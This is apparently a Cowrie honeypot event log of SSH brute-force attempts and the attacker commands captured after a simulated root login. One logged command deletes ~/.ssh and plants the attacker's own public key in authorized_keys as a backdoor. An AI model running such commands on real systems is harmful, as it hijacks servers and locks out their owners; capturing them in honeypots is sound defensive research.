{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T21:58:50.070465Z","src_ip":"212.227.235.229","session":"252b20915d36"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:58:50.071450Z","src_ip":"212.227.235.229","session":"252b20915d36"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34914,"dst_ip":"1.2.3.4","dst_port":22,"session":"b7ef5049a2fb","protocol":"ssh","message":"New connection: 212.227.235.229:34914 (1.2.3.4:22) [session: b7ef5049a2fb]","sensor":"my-vps","timestamp":"2025-09-08T21:58:50.252814Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:58:50.253417Z","src_ip":"212.227.235.229","session":"b7ef5049a2fb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:58:50.431638Z","src_ip":"212.227.235.229","session":"b7ef5049a2fb"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T21:58:51.185681Z","src_ip":"212.227.235.229","session":"b7ef5049a2fb"}
{"eventid":"cowrie.session.connect","src_ip":"206.168.34.39","src_port":50974,"dst_ip":"1.2.3.4","dst_port":22,"session":"d5e6ae1e3979","protocol":"ssh","message":"New connection: 206.168.34.39:50974 (1.2.3.4:22) [session: d5e6ae1e3979]","sensor":"my-vps","timestamp":"2025-09-08T21:58:52.122790Z"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:58:52.364335Z","src_ip":"212.227.235.229","session":"b7ef5049a2fb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34928,"dst_ip":"1.2.3.4","dst_port":22,"session":"0d9d37bf5948","protocol":"ssh","message":"New connection: 212.227.235.229:34928 (1.2.3.4:22) [session: 0d9d37bf5948]","sensor":"my-vps","timestamp":"2025-09-08T21:58:52.539782Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:58:52.540619Z","src_ip":"212.227.235.229","session":"0d9d37bf5948"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:58:52.717819Z","src_ip":"212.227.235.229","session":"0d9d37bf5948"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T21:58:52.842883Z","src_ip":"206.168.34.39","session":"d5e6ae1e3979"}
{"eventid":"cowrie.client.kex","hassh":"873a5fb5fedc2d4f8638ebde4abc6cfc","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 873a5fb5fedc2d4f8638ebde4abc6cfc","sensor":"my-vps","timestamp":"2025-09-08T21:58:52.843758Z","src_ip":"206.168.34.39","session":"d5e6ae1e3979"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T21:58:53.227383Z","src_ip":"212.227.235.229","session":"ffd8863d785a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"32.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 32.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:58:53.228317Z","src_ip":"212.227.235.229","session":"ffd8863d785a"}
{"eventid":"cowrie.session.closed","duration":"36.7","message":"Connection lost after 36.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:58:53.229876Z","src_ip":"212.227.235.229","session":"ffd8863d785a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T21:58:53.467911Z","src_ip":"212.227.235.229","session":"0d9d37bf5948"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:58:53.642569Z","src_ip":"212.227.235.229","session":"252b20915d36"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:58:53.645957Z","src_ip":"212.227.235.229","session":"0d9d37bf5948"}
{"eventid":"cowrie.session.connect","src_ip":"206.168.34.39","src_port":60542,"dst_ip":"1.2.3.4","dst_port":23,"session":"ce491b5cdb68","protocol":"telnet","message":"New connection: 206.168.34.39:60542 (1.2.3.4:23) [session: ce491b5cdb68]","sensor":"my-vps","timestamp":"2025-09-08T21:58:55.936893Z"}
{"eventid":"cowrie.session.closed","duration":"15.8","message":"Connection lost after 15.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:59:07.952892Z","src_ip":"206.168.34.39","session":"d5e6ae1e3979"}
{"eventid":"cowrie.session.closed","duration":15.314992904663086,"message":"Connection lost after 15 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:59:11.251817Z","src_ip":"206.168.34.39","session":"ce491b5cdb68"}
{"eventid":"cowrie.session.connect","src_ip":"206.168.34.39","src_port":55304,"dst_ip":"1.2.3.4","dst_port":23,"session":"b5a2fd9e859a","protocol":"telnet","message":"New connection: 206.168.34.39:55304 (1.2.3.4:23) [session: b5a2fd9e859a]","sensor":"my-vps","timestamp":"2025-09-08T21:59:15.848257Z"}
{"eventid":"cowrie.session.closed","duration":3.228508472442627,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:59:19.076679Z","src_ip":"206.168.34.39","session":"b5a2fd9e859a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47206,"dst_ip":"1.2.3.4","dst_port":22,"session":"b424716828b2","protocol":"ssh","message":"New connection: 212.227.235.229:47206 (1.2.3.4:22) [session: b424716828b2]","sensor":"my-vps","timestamp":"2025-09-08T21:59:21.421186Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:59:21.422899Z","src_ip":"212.227.235.229","session":"b424716828b2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:59:21.731798Z","src_ip":"212.227.235.229","session":"b424716828b2"}
{"eventid":"cowrie.login.failed","username":"dspace","password":"Password1","message":"login attempt [dspace/Password1] failed","sensor":"my-vps","timestamp":"2025-09-08T21:59:23.007942Z","src_ip":"212.227.235.229","session":"b424716828b2"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:59:24.319215Z","src_ip":"212.227.235.229","session":"b424716828b2"}
{"eventid":"cowrie.session.connect","src_ip":"206.168.34.39","src_port":45028,"dst_ip":"1.2.3.4","dst_port":23,"session":"ef539819f312","protocol":"telnet","message":"New connection: 206.168.34.39:45028 (1.2.3.4:23) [session: ef539819f312]","sensor":"my-vps","timestamp":"2025-09-08T21:59:24.555212Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55752,"dst_ip":"1.2.3.4","dst_port":22,"session":"352528648a6f","protocol":"ssh","message":"New connection: 212.227.235.229:55752 (1.2.3.4:22) [session: 352528648a6f]","sensor":"my-vps","timestamp":"2025-09-08T21:59:25.389796Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47166,"dst_ip":"1.2.3.4","dst_port":22,"session":"241731af0b8d","protocol":"ssh","message":"New connection: 212.227.235.229:47166 (1.2.3.4:22) [session: 241731af0b8d]","sensor":"my-vps","timestamp":"2025-09-08T21:59:28.734527Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:59:28.735245Z","src_ip":"212.227.235.229","session":"241731af0b8d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:59:29.027374Z","src_ip":"212.227.235.229","session":"241731af0b8d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56494,"dst_ip":"1.2.3.4","dst_port":22,"session":"f6a941cafa1d","protocol":"ssh","message":"New connection: 212.227.235.229:56494 (1.2.3.4:22) [session: f6a941cafa1d]","sensor":"my-vps","timestamp":"2025-09-08T21:59:30.119174Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:59:30.234161Z","src_ip":"212.227.235.229","session":"f6a941cafa1d"}
{"eventid":"cowrie.login.failed","username":"audit","password":"12345","message":"login attempt [audit/12345] failed","sensor":"my-vps","timestamp":"2025-09-08T21:59:30.239114Z","src_ip":"212.227.235.229","session":"241731af0b8d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:59:30.460452Z","src_ip":"212.227.235.229","session":"f6a941cafa1d"}
{"eventid":"cowrie.login.success","username":"root","password":"Abcd_1234","message":"login attempt [root/Abcd_1234] succeeded","sensor":"my-vps","timestamp":"2025-09-08T21:59:31.399845Z","src_ip":"212.227.235.229","session":"f6a941cafa1d"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:59:31.532976Z","src_ip":"212.227.235.229","session":"241731af0b8d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:59:31.827092Z","src_ip":"212.227.235.229","session":"f6a941cafa1d"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T21:59:31.827775Z","src_ip":"212.227.235.229","session":"f6a941cafa1d"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T21:59:31.828841Z","src_ip":"212.227.235.229","session":"f6a941cafa1d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:59:32.033210Z","src_ip":"212.227.235.229","session":"f6a941cafa1d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:59:32.555494Z","src_ip":"212.227.235.229","session":"f6a941cafa1d"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T21:59:32.556199Z","src_ip":"212.227.235.229","session":"f6a941cafa1d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T21:59:32.763446Z","src_ip":"212.227.235.229","session":"f6a941cafa1d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:59:32.764374Z","src_ip":"212.227.235.229","session":"f6a941cafa1d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56498,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba6132bd1528","protocol":"ssh","message":"New connection: 212.227.235.229:56498 (1.2.3.4:22) [session: ba6132bd1528]","sensor":"my-vps","timestamp":"2025-09-08T21:59:32.966253Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:59:32.967104Z","src_ip":"212.227.235.229","session":"ba6132bd1528"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:59:33.170753Z","src_ip":"212.227.235.229","session":"ba6132bd1528"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T21:59:34.025212Z","src_ip":"212.227.235.229","session":"ba6132bd1528"}
{"eventid":"cowrie.session.closed","duration":10.447273015975952,"message":"Connection lost after 10 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:59:35.002421Z","src_ip":"206.168.34.39","session":"ef539819f312"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:59:35.231023Z","src_ip":"212.227.235.229","session":"ba6132bd1528"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56502,"dst_ip":"1.2.3.4","dst_port":22,"session":"f86c8a25615f","protocol":"ssh","message":"New connection: 212.227.235.229:56502 (1.2.3.4:22) [session: f86c8a25615f]","sensor":"my-vps","timestamp":"2025-09-08T21:59:35.433237Z"}
